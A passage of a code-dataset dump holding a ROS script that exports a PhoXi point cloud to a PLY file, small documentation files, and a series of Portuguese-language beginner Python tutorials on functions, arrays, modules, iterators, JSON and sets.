"text": "\"\"\"\nScript to register a webcam to the Photoneo PhoXi\nAuthor: Matt Matl\n\"\"\"\nimport argparse\nimport logging\n\nimport rosgraph.roslogging as rl\nimport rospy\nfrom autolab_core import YamlConfig\nfrom visualization import Visualizer3D as vis3d\n\nfrom perception import RgbdSensorFactory\n\n\ndef main():\n logging.getLogger().setLevel(logging.INFO)\n\n # parse args\n parser = argparse.ArgumentParser(\n description=\"Register a webcam to the Photoneo PhoXi\"\n )\n parser.add_argument(\n \"--config_filename\",\n type=str,\n default=\"cfg/tools/colorize_phoxi.yaml\",\n help=\"filename of a YAML configuration for registration\",\n )\n args = parser.parse_args()\n config_filename = args.config_filename\n config = YamlConfig(config_filename)\n\n sensor_data = config[\"sensors\"]\n phoxi_config = sensor_data[\"phoxi\"]\n phoxi_config[\"frame\"] = \"phoxi\"\n\n # Initialize ROS node\n rospy.init_node(\"colorize_phoxi\", anonymous=True)\n logging.getLogger().addHandler(rl.RosStreamHandler())\n\n # Get PhoXi sensor set up\n phoxi = RgbdSensorFactory.sensor(phoxi_config[\"type\"], phoxi_config)\n phoxi.start()\n\n # Capture PhoXi and webcam images\n phoxi_color_im, phoxi_depth_im, _ = phoxi.frames()\n\n # vis2d.figure()\n # vis2d.subplot(121)\n # vis2d.imshow(phoxi_color_im)\n # vis2d.subplot(122)\n # vis2d.imshow(phoxi_depth_im)\n # vis2d.show()\n\n phoxi_pc = phoxi.ir_intrinsics.deproject(phoxi_depth_im)\n colors = (\n phoxi_color_im.data.reshape(\n (\n phoxi_color_im.shape[0] * phoxi_color_im.shape[1],\n phoxi_color_im.shape[2],\n )\n )\n / 255.0\n )\n vis3d.figure()\n vis3d.points(phoxi_pc.data.T[::3], color=colors[::3], scale=0.001)\n vis3d.show()\n\n # Export to PLY file\n vertices = phoxi.ir_intrinsics.deproject(phoxi_depth_im).data.T\n colors = phoxi_color_im.data.reshape(\n phoxi_color_im.data.shape[0] * phoxi_color_im.data.shape[1],\n phoxi_color_im.data.shape[2],\n )\n f = open(\"pcloud.ply\", \"w\")\n f.write(\n \"ply\\nformat ascii 1.0\\nelement vertex {}\\nproperty float x\\n\"\n \"property float y\\nproperty float z\\nproperty uchar red\\n\".format(\n len(vertices)\n )\n + \"property uchar green\\nproperty uchar blue\\nend_header\\n\"\n )\n for v, c in zip(vertices, colors):\n f.write(\n \"{} {} {} {} {} {}\\n\".format(v[0], v[1], v[2], c[0], c[1], c[2])\n )\n f.close()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6000000238418579,
"avg_line_length": 9,
"blob_id": "4f83dde691c4a3f5540b1bb59a1b75f6ffcc5377",
"content_id": "6872f91172fb66cb796424fa5028562c8f8a5957",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 30,
"license_type": "permissive",
"max_line_length": 13,
"num_lines": 3,
"path": "/docs/gh_deploy.sh",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\nmake gh-pages\ncd ..\n"
},
{
"alpha_fraction": 0.6393442749977112,
"alphanum_fraction": 0.6393442749977112,
"avg_line_length": 14.913043022155762,
"blob_id": "c96a17c2cf0ebd79bfddda7226a9b098cc13815b",
"content_id": "2f9fb7402c1547afb2d7366c2248d0222711dc54",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "reStructuredText",
"length_bytes": 732,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 46,
"path": "/docs/source/api/image.rst",
"repo_name": "BerkeleyAutomation/perception",
"src_encoding": "UTF-8",
"text": "Image Classes\n=============\n\nImage\n~~~~~\n.. autoclass:: perception.Image\n\nColorImage\n~~~~~~~~~~\n.. autoclass:: perception.ColorImage\n\nDepthImage\n~~~~~~~~~~\n.. autoclass:: perception.DepthImage\n\nIrImage\n~~~~~~~\n.. autoclass:: perception.IrImage\n\nGrayscaleImage\n~~~~~~~~~~~~~~\n.. autoclass:: perception.IrImage\n\nBinaryImage\n~~~~~~~~~~~\n.. autoclass:: perception.BinaryImage\n\nSegmentationImage\n~~~~~~~~~~~~~~~~~\n.. autoclass:: perception.SegmentationImage\n\nPointCloudImage\n~~~~~~~~~~~~~~~\n.. autoclass:: perception.PointCloudImage\n\nNormalCloudImage\n~~~~~~~~~~~~~~~~\n.. autoclass:: perception.NormalCloudImage\n\nRenderMode\n~~~~~~~~~~\n.. autoclass:: perception.RenderMode\n\nObjectRender\n~~~~~~~~~~~~\n.. autoclass:: perception.ObjectRender\n"
}
] | 40 |
rogerio5ouza/python-beginner
|
https://github.com/rogerio5ouza/python-beginner
|
0150281a9c98e289bb93f81489e9ff78b760fabc
|
f2b1cd8c37413f8db6141213aec165f65567248c
|
cc1455b3ac9053e7f2b5d03bc1cfc53116cb6963
|
refs/heads/master
| 2022-12-27T13:57:41.344799 | 2020-10-10T13:50:02 | 2020-10-10T13:50:02 | 257,658,246 | 0 | 0 | null | 2020-04-21T16:58:51 | 2020-10-10T13:42:39 | 2020-10-10T13:50:02 |
Python
|
[
{
"alpha_fraction": 0.689393937587738,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 21,
"blob_id": "16d7107bd5d6a2b257b2fe93cf577454c7e978da",
"content_id": "e4c07bbee3adebde7843e6b229329868db5f8521",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 6,
"path": "/semana-4/modules_7.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "# Exemplo\n# Importa apenas o dicionário 'pessoa_1' do módulo 'modules_6':\n\nfrom modules_6 import pessoa_1\n\nprint(pessoa_1['idade'])\n"
},
{
"alpha_fraction": 0.7342657446861267,
"alphanum_fraction": 0.7377622127532959,
"avg_line_length": 21,
"blob_id": "59ab62402b513d26f9ebb97024beadae56c79d32",
"content_id": "9e77508839f65d12245c14624c68abe6ce0461d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 290,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 13,
"path": "/semana-4/modules_3.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "import modules as mx\n\n'''\nNomeando um Módulo\n\nPodemos nomear o arquivo do módulo como quisermos, mas deve ter a extensão de arquivo .py.\n\nPodemos criar um alias ao importar um módulo, usando a keyword as.\n'''\n# Cria um alias para modules chamado mx:\n\na = mx.pessoa_1[\"cidade\"]\nprint(a)\n"
},
{
"alpha_fraction": 0.7307803630828857,
"alphanum_fraction": 0.7365825176239014,
"avg_line_length": 21.82781410217285,
"blob_id": "b45474ba052f2923d8d13a86d8170e51f5d3f247",
"content_id": "9e38514326e5fc167408abc1a17f7578d3e80790",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3533,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 151,
"path": "/semana-3/functions.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nFunctions\n\nUma função é um bloco de de código que só é executado quando é chamado.\nPodemos passar dados, conhecidos como parâmetros, para uma função.\nUma função pode retornar dados como resultado.\n'''\n# Exemplo:\n\n\ndef minha_function():\n print('Olá, da minha função!')\n\n\nminha_function()\n\n'''\nArguments (Argumentos)\n\nUma informação pode ser passada para uma função como argumento.\nArgumentos são definidos depois do nome da função, entre parênteses. Podemos adicionar quantos argumentos quisermos, basta apenas separá-los com uma vírgula.\n'''\n# Exemplo:\n\n\ndef nomeCompleto(nome):\n print(nome + ' Souza')\n\n\nnomeCompleto('Rogerio')\nnomeCompleto('Carol')\nnomeCompleto('Hermano')\n\n'''\nNumbers of Arguments (Números de argumentos)\n\nPor padrão, uma função deve ser chamada com o número correto de argumentos. Isso significa que, se uma função espera receber 2 argumentos, devemos chamar \na função com 2 argumentos, nem mais nem menos.\n'''\n# Exemplo:\n\n\ndef nomeCompleto_2(nome, sobrenome):\n print(nome + ' ' + sobrenome)\n\n\nnomeCompleto_2('Hermano', 'Souza')\n\n'''\nArbitrary Arguments, *args (Argumentos arbitrários)\n\nQuando não soubermos quantos argumentos serão passados para uma função, adicionamos um * antes do nome do parâmetro na definição da função.\nDessa forma, a função receberá uma tupla de argumentos e poderá acessar os itens de acordo.\n'''\n# Exemplo:\n\n\ndef func_tipos_transporte(*transporte):\n print('Meu transporte preferido é' + transporte[2])\n\n\nfunc_tipos_transporte('Aquatico', 'Aereo', 'Terrestre')\n\n# Se o número de argumentos da keyword for desconhecido, adicionamos um duplo ** antes do nome do parâmetro:\n\n\ndef func_tipos_transporte_2(**transporte):\n print('Meu transporte preferido é' + transporte['terrestre'])\n\n\nfunc_tipos_transporte_2(aquatico='barco', aereo='aviao', terrestre='bicicleta')\n\n'''\nKeyword Arguments (Argumentos de palavras-chave)\n\nPodemos ainda passar argumentos com a sintaxe: key = valeu.\nDessa forma a ordem dos arguentos não importa.\n'''\n# Exemplo:\n\n\ndef meusFilhos(filho3, filho2, filho1):\n print('O caçula é o ' + filho3)\n\n\nmeusFilhos(filho1='José', filho2='Tomas', filho3='Torvalds')\n\n'''\nDefault Parameter Value (Valor padrão do parâmetro)\n\nSe chamarmos uma função sem argumento, ela usará um valor padrão.\n'''\n# Exemplo:\n\n\ndef func_nacionalidade(pais='Brasil'):\n print('Eu sou do (a) ' + pais)\n\n\nfunc_nacionalidade('Dinamarca')\nfunc_nacionalidade('India')\nfunc_nacionalidade()\nfunc_nacionalidade('Grecia')\n\n'''\nPassing a List as an Argument (Passando uma lista como argumento)\n\nPodemos enviar qualquer tipo de argumento de dados para uma função (string, número, lista, dicionário, etc...) que será tratado com o mesmo tipo\nde dados dentro da função.\n\nPodemos enviar uma lista como argumento, que ainda será uma lista quando atingir a função.\n'''\n# Exemplo:\n\n\ndef func_comida(food):\n for x in food:\n print(x)\n\n\nfrutas = ['banana', 'manga', 'laranja']\n\nfunc_comida(frutas)\n\n'''\nReturn Values (Retornar valores)\n\nPara permitir que uma função retorne um valor, usamos o comando return.\n'''\n# Exemplo:\n\n\ndef func_multiplica(x):\n return 10 * x\n\n\nprint(func_multiplica(2))\nprint(func_multiplica(5))\nprint(func_multiplica(10))\n\n'''\nThe pass Statement (A declaração pass)\n\nAs definições de uma função não podem estar vazias, mas se, por algum motivo, \ntivermos uma função sem conteúdo, inserimos a instrução pass para evitar erros.\n'''\n# Exemplos:\n\n\ndef minha_func():\n pass\n"
},
{
"alpha_fraction": 0.7313054203987122,
"alphanum_fraction": 0.7427123188972473,
"avg_line_length": 22.205883026123047,
"blob_id": "90bcc007bb9420fbbb923426ad8c06b98579066b",
"content_id": "e83a4b02dce9c01c9b1702c789d14bc4b8533c29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 807,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 34,
"path": "/semana-4/math_2.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nO módulo Math\n\nPython possui um módulo integrado chamado Math, que estende uma lista de funções matemáticas.\n\nPara usá-lo, devemos importá-lo.\n\nDepois de importá-lo, podemos começar a usar os métodos e constantes.\n'''\n\n# O método math.sqrt() retorna a raiz quadrada de um número:\n\nimport math\n\nnumero_quadrado = math.sqrt(49)\nprint(numero_quadrado)\n\n'''\nO método math.ceil() arredonda um número para cima, para seu inteiro mais próximo, e o método math.floor() \narredonda um número para baixo, para seu inteiro mais próximo e retorna o resultado.\n'''\n# Exemplo:\n\narredonda_pra_cima = math.ceil(1.4)\narredonda_pra_baixo = math.floor(1.4)\n\nprint(arredonda_pra_cima)\nprint(arredonda_pra_baixo)\n\n# A constante math.pi retorna o valor de PI(3,14...):\n\nnumero_pi = math.pi\n\nprint(numero_pi)\n"
},
{
"alpha_fraction": 0.5315638184547424,
"alphanum_fraction": 0.5961262583732605,
"avg_line_length": 26.8799991607666,
"blob_id": "b598782fd519e12a7623afe3352fa64e38e074c8",
"content_id": "70f12591cbb33df36b38b94c024eb6f410646574",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1418,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 50,
"path": "/semana-1/variaveis.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nTipos de Variáveis em Python \n\n str (-ing) 'Texto entre aspas', 'palavra'\n bool (-lean) True ou False\n int (-eger) 1, 2, 10, 5000\n float 3.5432, 9.8, 1.61803398875\n list [ 'palavra', True, 1, 3.1415]\n dict { 'prop':'nome', 'tem':True }\n tuple ( 'palavra', True, 1, 3.1415)\n type Tipo dos tipos\n\n'''\n\n# Variáveis - Reserva um espaço na memória para armazenar um dado/valor de um determinado tipo, e o associa a um nome.\nvar_1 = 5\nvar_2 = 10\ntotal = var_1 + var_2\n\nprint(total)\n\n# tipagem dinâmica: o último valor atribuído à variável indicará o tipo dela.\nvar_1 = \"valor\" # atribuição de string\nvar_2 = 'valor' # atribuição de string\nvar_1 = 5 # atribuição de inteiro\nvar_2 = 3.1337 # atribuição de float\na, b, c = 1, 2, 'teste' # múltiplas atribuições\n\n# str - tipo composto por um conjunto 'imutável' de caracteres, texto.\nfruta = \"banana\"\nmarca = \"\"\"Tesla\"\"\"\nstr_1 = 'abc'\nstr2 = '''teste'''\nlen(fruta) # retorna o comprimento, 6.\nfruta[0] # retorna 'b'\nfruta[2:5] # retorna 'nan'\nfruta.upper() # retorna 'BANANA'\n\n# bool - verdadeiro ou falso.\nvar1 = True # verdadeiro\nvar2 = False # falso\n\n# int números inteiros - sem limites de bits.\nvar1 = 1991\nvar2 = 2020\n\n\n# float - números decimais (double).\nvar_1 = 1.2345\nvar_2 = 3.141592\n"
},
{
"alpha_fraction": 0.7193695902824402,
"alphanum_fraction": 0.7208947539329529,
"avg_line_length": 22.698795318603516,
"blob_id": "d92117d9888a2369d726cb50f05632c5381c027b",
"content_id": "9e52f6deac8fdad1756043fb2bb13522a267ecce",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1983,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 83,
"path": "/semana-3/arrays.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nArrays\n\nO que é um Array?\n\nUm Array é uma variável especial, que pode conter mais de um valor.\n\nUm Array pode conter muitos valores com um único nome e podemos acessar esses valores consultando um número do índice.\n\nNota: O Python não possui suporte nativo para matrizes, mas as listas do Python podem ser usadas como Arrays.\nNo entanto para trabalhar com matrizes no Python, precisamos importar uma biblioteca, como a NumPy.\n\nArrays são usados para armazenar múltiplos valores em uma variável.\n'''\n# Exemplo:\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\nprint(carros)\n\n'''\nAcessando elementos de Array\n\nPodemos acessar os elementos de uma Array através de seu índice.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\nelementos_carros = carros[1]\nprint(elementos_carros)\n\n# Modificando o valor de um item de Array:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros[2] = 'Nissan'\nprint(carros)\n\n'''\nComprimento de um Array\n\nUsamos o método len() para rtornar o comprimento de um Array.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncomprimento_carros = len(carros)\nprint(comprimento_carros)\n\n'''\nLoop de elementos em um Array\n\nPodemos usar o loop FOR IN para percorrer todos os elementos de um Array.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\nfor elementos in carros:\n print(elementos)\n\n'''\nAdding Array Elements (Adicionando elementos de Array)\n\nPodemos usar o método append() para adicionar elemento em um Array.\n'''\n# Exemplo:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros.append('Honda')\nprint(carros)\n\n'''\nRemoving Array Elements (Removendo Elementos de um Array)\n\nUsamos o método pop() para remover um elemento de uma Array.\n'''\n# Exemplo:\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros.pop(0)\nprint(carros)\n\n# Podemos ainda usar o método remove() para remover elementos:\n\ncarros = ['Fiat', 'Ford', 'Volkswagen', 'Toyota']\ncarros.remove('Ford')\nprint(carros)\n"
},
{
"alpha_fraction": 0.6782007217407227,
"alphanum_fraction": 0.6874279379844666,
"avg_line_length": 21.842105865478516,
"blob_id": "d815e6e547442830c8f4aafa0b0e7c1293a05f0a",
"content_id": "7bd640db4a0afa4988811641a66e29b2698a485a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 898,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 38,
"path": "/semana-1/syntax.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "# A sintaxe Python para a função print():\n\nprint('Hello, World!')\n\n# Indentação Python\n\n'''\nIndentação em Python refere-se aos espaços no início de uma linha de código.\n\nOnde em outras linguagens de programação o recuo no código é apenas para legibilidade, em Python é muito importante.\n\nPython usa indentação para indicar um bloco de código.\n'''\n# Exemplo:\n\nif 5 > 2:\n print('Cinco é maior que dois!')\n\n'''\nO número de espaços depende de você como programador, mas deve ser pelo menos um.\n'''\n# Exemplo:\n\nif 5 > 2:\n print('Cinco é maior que dois!')\nif 5 > 2:\n print('Cinco é maior que dois!')\n\n'''\nVocê precisa usar o mesmo número de espaços no mesmo bloco de código, caso contrário, o Python apresentará um erro:\n'''\n# Exemplo:\n\n'''\nif 5 > 2:\n print('Cinco é maior que dois!') # Syntax Error\n print('Cinco é maior que dois!') # Syntax Error\n'''"
},
{
"alpha_fraction": 0.6833013296127319,
"alphanum_fraction": 0.6890594959259033,
"avg_line_length": 18.296297073364258,
"blob_id": "448816f61ad7fbd0736ec8f2e0049843cb3c3828",
"content_id": "3a7e345069bf5ab5cddff4f4df8eeab541560067",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 535,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 27,
"path": "/semana-4/modules.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nO que é um Módulo?\n\nConsideramos um Módulo igual a uma biblioteca de código.\nUm arquivo contendo um conjunto de funções que podemos incluir em nossos arquivos.\n'''\n# Exemplo:\n# Vamos salvar esse código com o nome do arquivo meu_modulo.py:\n\n\nimport modules as mx\n\n\ndef boas_vindas(name):\n print(\"Ola, \" + name)\n\n\n'''\nVariáveis no Módulo\n\nO módulo pode conter funções e variáveis de todos os tipos (arrays, dicionários, objetos etc.).\n'''\npessoa_1 = {\n \"nome\": \"Joao\",\n \"idade\": 32,\n \"cidade\": \"Brasilia\"\n}\n"
},
{
"alpha_fraction": 0.6885474920272827,
"alphanum_fraction": 0.7178770899772644,
"avg_line_length": 26.538461685180664,
"blob_id": "d87a0acd3ad20b6712c675c7ec4bdbdbc68e1723",
"content_id": "4b554b4071c3aa7d3f7ba3baf87c2a05eaeae19a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 738,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 26,
"path": "/semana-4/math.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Math\n\nPython possui um conjunto de funções matemáticas nativa, incluindo um extenso módulo matemático, \nque permite realizar tarefas matemáticas com números. \n'''\n# Funções matemáticas nativa\n# As funções min() e max() podem ser usadas para encontrar o valor mais baixo ou mais alto em um iterável:\n\nmenor_valor = min(2, 4, 6, 8, 10)\nmaior_valor = max(2, 4, 6, 8, 10)\n\nprint(menor_valor)\nprint(maior_valor)\n\n# A função abs() retorna o valor absoluto (positivo) do número especificado:\n\nnumero_aleatorio = abs(-8.25)\nprint(numero_aleatorio)\n\n# A função pow(x, y) retorna o valor de x elevado à potência de y (xy)\n# Exemplo\n# Retorna o valor de 4 à potência de 3 (igual a 5 * 5 *):\n\nx = pow(5, 3)\nprint(x)\n"
},
{
"alpha_fraction": 0.6989708542823792,
"alphanum_fraction": 0.7089765667915344,
"avg_line_length": 26.543306350708008,
"blob_id": "7042715a8ce62c6e1b092fffb9000f45c5ebde43",
"content_id": "d700c7d47ab4aba5aa4f2e5d541b5ae50a0cccfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3561,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 127,
"path": "/semana-4/iterators.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Iterators\n\nUm Iterator é um objeto que contém um número contável de valores.\nQue pode ser iterado, o que significa que podemos percorrer todos os valores.\nTecnicamente, em Python, um Iterator é um objeto que implementa o protocolo do Iterator, que consiste nos métodos __iter__() e __next__().\n\nIterator vs Iterable\n\nLists, tuples, dictionaries e sets são todos objetos iteráveis. Eles são contêineres iteraveis dos quais podemos obter um Iterator.\nTodos esses objetos possuem um método iter() que é usado para obter um Iterator.\n'''\n# Exemplo:\n# Retorna um Iterator de uma tupla e, imprime cada um de seu valor:\nminha_tuple_frutas = ('apple', 'banana', 'cherry', 'orange', 'melon')\nmeu_iterator = iter(minha_tuple_frutas)\n\nprint(next(meu_iterator))\nprint(next(meu_iterator))\nprint(next(meu_iterator))\nprint(next(meu_iterator))\nprint(next(meu_iterator))\n\n# Até mesmo Strings são objetos iráveis e podem retornar um Iterator.\n# Exemplo:\n\nminha_string = 'banana'\nmeu_iterator_2 = iter(minha_string)\n\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\nprint(next(meu_iterator_2))\n\n'''\nLooping Through an Iterator\n\nPodemos ainda, usar um loop FOR para iterar através de um objeto iterável.\n'''\n# Exemplo:\n# Iterar os valores de uma Tuple:\n\nminha_tuple_frutas_2 = ('maca', 'banana', 'cereja')\n\nfor frutas in minha_tuple_frutas_2:\n print(frutas)\n\n# Iterar os caracteres de uma String:\n\nminha_string_fruta = 'cereja'\n\nfor fruta in minha_string_fruta:\n print(fruta)\n\n# O laço For cria um objeto Iterador e executa o método next() para cada laço.\n\n'''\nCreate an Iterator\n\nPara criar um objeto/classe como um Iterator, implementamos os métodos __iter__() e __next__() em seu objeto.\n\nComo vimos em Classes/Objetos do Python, todas as classes têm uma função chamada __init__(), que permite que façamos algumas inicializações quando\no objeto está sendo criado.\n\nO método __iter__() atua de forma semelhante, podemos fazer operações (inicializaçõe, etc.), mas devemos sempre retornar o próprio objeto Iterador.\n\nO método __next__() também permite que façamos operações que deve retornar o próximo item na sequência.\n'''\n# Exemplo:\n# Cria um Iterador que retorne números, começando com 1, e cada sequência aumentará em um (retornando 1,2,3,4,5 e etc.):\n\n\nclass meus_numeros:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n x = self.a\n self.a += 1\n return x\n\n\nminha_classe = meus_numeros()\nmeu_iterator_3 = iter(minha_classe)\n\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\nprint(next(meu_iterator_3))\n\n\n'''\nStopIteration\n\nO exemple acima continuaria para sempre se tivéssemos instruções next() suficientes ou se fosse usado em um loop For.\n\nPara evitar que a iteração continue indefinidamente, podemos usar a instrução StopIteration.\n\nNo método __next__(), podemos adicionar uma condição de término para gerar um erro se a iteração for feita um número específico de vezes.\n'''\n# Exemplo:\n# Pare após 20 iterações:\n\n\nclass meus_numeros_2:\n def __iter__(self):\n self.a = 1\n return self\n\n def __next__(self):\n if self.a <= 20:\n x = self.a\n self.a += 1\n return x\n else:\n raise StopIteration\n\n\nminha_classe_2 = meus_numeros_2()\nmeu_iterator_4 = iter(minha_classe_2)\n\nfor x in meu_iterator_4:\n print(x)\n"
},
{
"alpha_fraction": 0.6944444179534912,
"alphanum_fraction": 0.6994949579238892,
"avg_line_length": 19.789474487304688,
"blob_id": "cdd6c7ae7d2666ba9c3a14d383060dc8e616b624",
"content_id": "19fba002fd772fba188c370eedc07911d421c9f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 19,
"path": "/semana-4/convert_python_to_json.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "\nimport json\n'''\nConverter de Python para JSON\n\nSe tivermos um objeto Python, poderemos convertê-lo em uma string JSON usando o método json.dumps().\n'''\n# um objeto Python (dict):\n\ndados_pessoais = {\n \"nome\": \"Rogerio\",\n \"idade\": 30,\n \"cidade\": \"Brasili-DF\"\n}\n\n# converte para JSON:\ndados_convertidos = json.dumps(dados_pessoais)\n\n# o resultado será uma string:\nprint(dados_convertidos)\n"
},
{
"alpha_fraction": 0.5562784671783447,
"alphanum_fraction": 0.5797007083892822,
"avg_line_length": 20.64788818359375,
"blob_id": "a7ec9530bb93f29211162ebb3f1414bc34bffcc9",
"content_id": "4fcc3978b2c03b1f60247d58f43f64b8dc4db411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1550,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 71,
"path": "/semana-4/format_the_result.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "\"\"\"\nFormart the Result\n\nO método json.dumps() possui parâmetros para facilitar a leitura do resultado.\n\"\"\"\n\nimport json\n\nx = {\n \"name\": \"John\",\n \"age\": 30,\n \"married\": True,\n \"divorced\": False,\n \"children\": (\"Ann\", \"Billy\"),\n \"pets\": None,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\n\n# Usamos quatro recuos para facilitar a leitura do resultado:\n\nprint(json.dumps(x, indent=4))\n\n\n\"\"\"\nPodemos também definirmos os separadores, o valor padrão é (\", \", \": \"), que significa usar uma vírgula e um espaço para\nsepararmos cada objeto, e dois pontos e um espaço para separar as chaves dos valores:\n\"\"\"\n\nx = {\n \"name\": \"John\",\n \"age\": 30,\n \"married\": True,\n \"divorced\": False,\n \"children\": (\"Ann\", \"Billy\"),\n \"pets\": None,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\n\nprint(json.dumps(x, indent=4, separators=(\". \", \" = \")))\n\n\n\"\"\"\nOrder the Result\n\nO método json.dumps() possui parâmetros para ordenar as chaves no resultado.\n\nUsamos o parâmetro sort_keys para especificar se o resultado deve ser classificado ou não:\n\"\"\"\n\nx = {\n \"name\": \"John\",\n \"age\": 30,\n \"married\": True,\n \"divorced\": False,\n \"children\": (\"Ann\", \"Billy\"),\n \"pets\": None,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\n\n# classificamos o resultado em ordem alfabética por chaves:\n\nprint(json.dumps(x, indent=4, sort_keys=True))\n"
},
{
"alpha_fraction": 0.6824703812599182,
"alphanum_fraction": 0.6843418478965759,
"avg_line_length": 21.11034393310547,
"blob_id": "9c7a748445b30c19ec58f5c3431f7e10281007e4",
"content_id": "2b5348efe9c8ea968f50c58e37e95520f3b5c884",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3235,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 145,
"path": "/semana-2/sets.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nSET (Conjunto)\n\nUm Set é uma coleção de itens não ordenada e nem indexada. Em Python Sets são escritos entre colchetes {}.\n'''\n# Exemplo:\n\nset_de_animais_felinos = {\n 'Tigre', 'Leao', 'Lince', 'Onca-pintada', 'Leopardo-das-neves', 'Guepardo'\n}\n\nprint(set_de_animais_felinos)\n\nprint(type(set_de_animais_felinos))\n\n'''\n Acesso de itens (Access Items)\n\n Não podemos acessar itens de um conjunto consultando seu índice, pois os conjuntos são desordenados e seus itens não possuem índice.\n Mas podemos percorrer os itens do conjunto usando um loop for ou perguntar se um valor específico está presente em um conjunto, usando a in keyword.\n'''\n# Exemplo:\n\nset_de_animais_felinos = {\n 'Tigre', 'Leao', 'Lince', 'Onca-pintada', 'Leopardo-das-neves', 'Guepardo'\n}\n\nfor x in set_de_animais_felinos:\n print(x)\n\n# Verifica se 'Guepardo' está presente no conjunto:\n\nset_de_animais_felinos = {'Tigre', 'Leao', 'Lince',\n 'Onca-pintada', 'Leopardo-das-neves', 'Guepardo'}\n\nprint('Guepardo' in set_de_animais_felinos)\n\n'''\nAdição de Itens (Add Items)\n\nPara adicionar um item em um conjunto, usamos o método add().\nPara adicionar mais de um item, usamos o método update().\n'''\n# Exemplo de add():\n\nset_de_animais_felinos = {'Tigre', 'Leao', 'Lince'}\n\nset_de_animais_felinos.add('Guepardo')\n\nprint(set_de_animais_felinos)\n\n# Exemplo de update():\n\nset_de_animais_felinos = {'Tigre', 'Leao', 'Lince'}\n\nset_de_animais_felinos.update(['Guepardo', 'Gato', 'Jaguar'])\n\nprint(set_de_animais_felinos)\n\n'''\nPara sabermos quantos itens um conjunto(Set) possui, \nusamos o método len().\n'''\n\n# Exemplo:\n\nset_animais = {'gato', 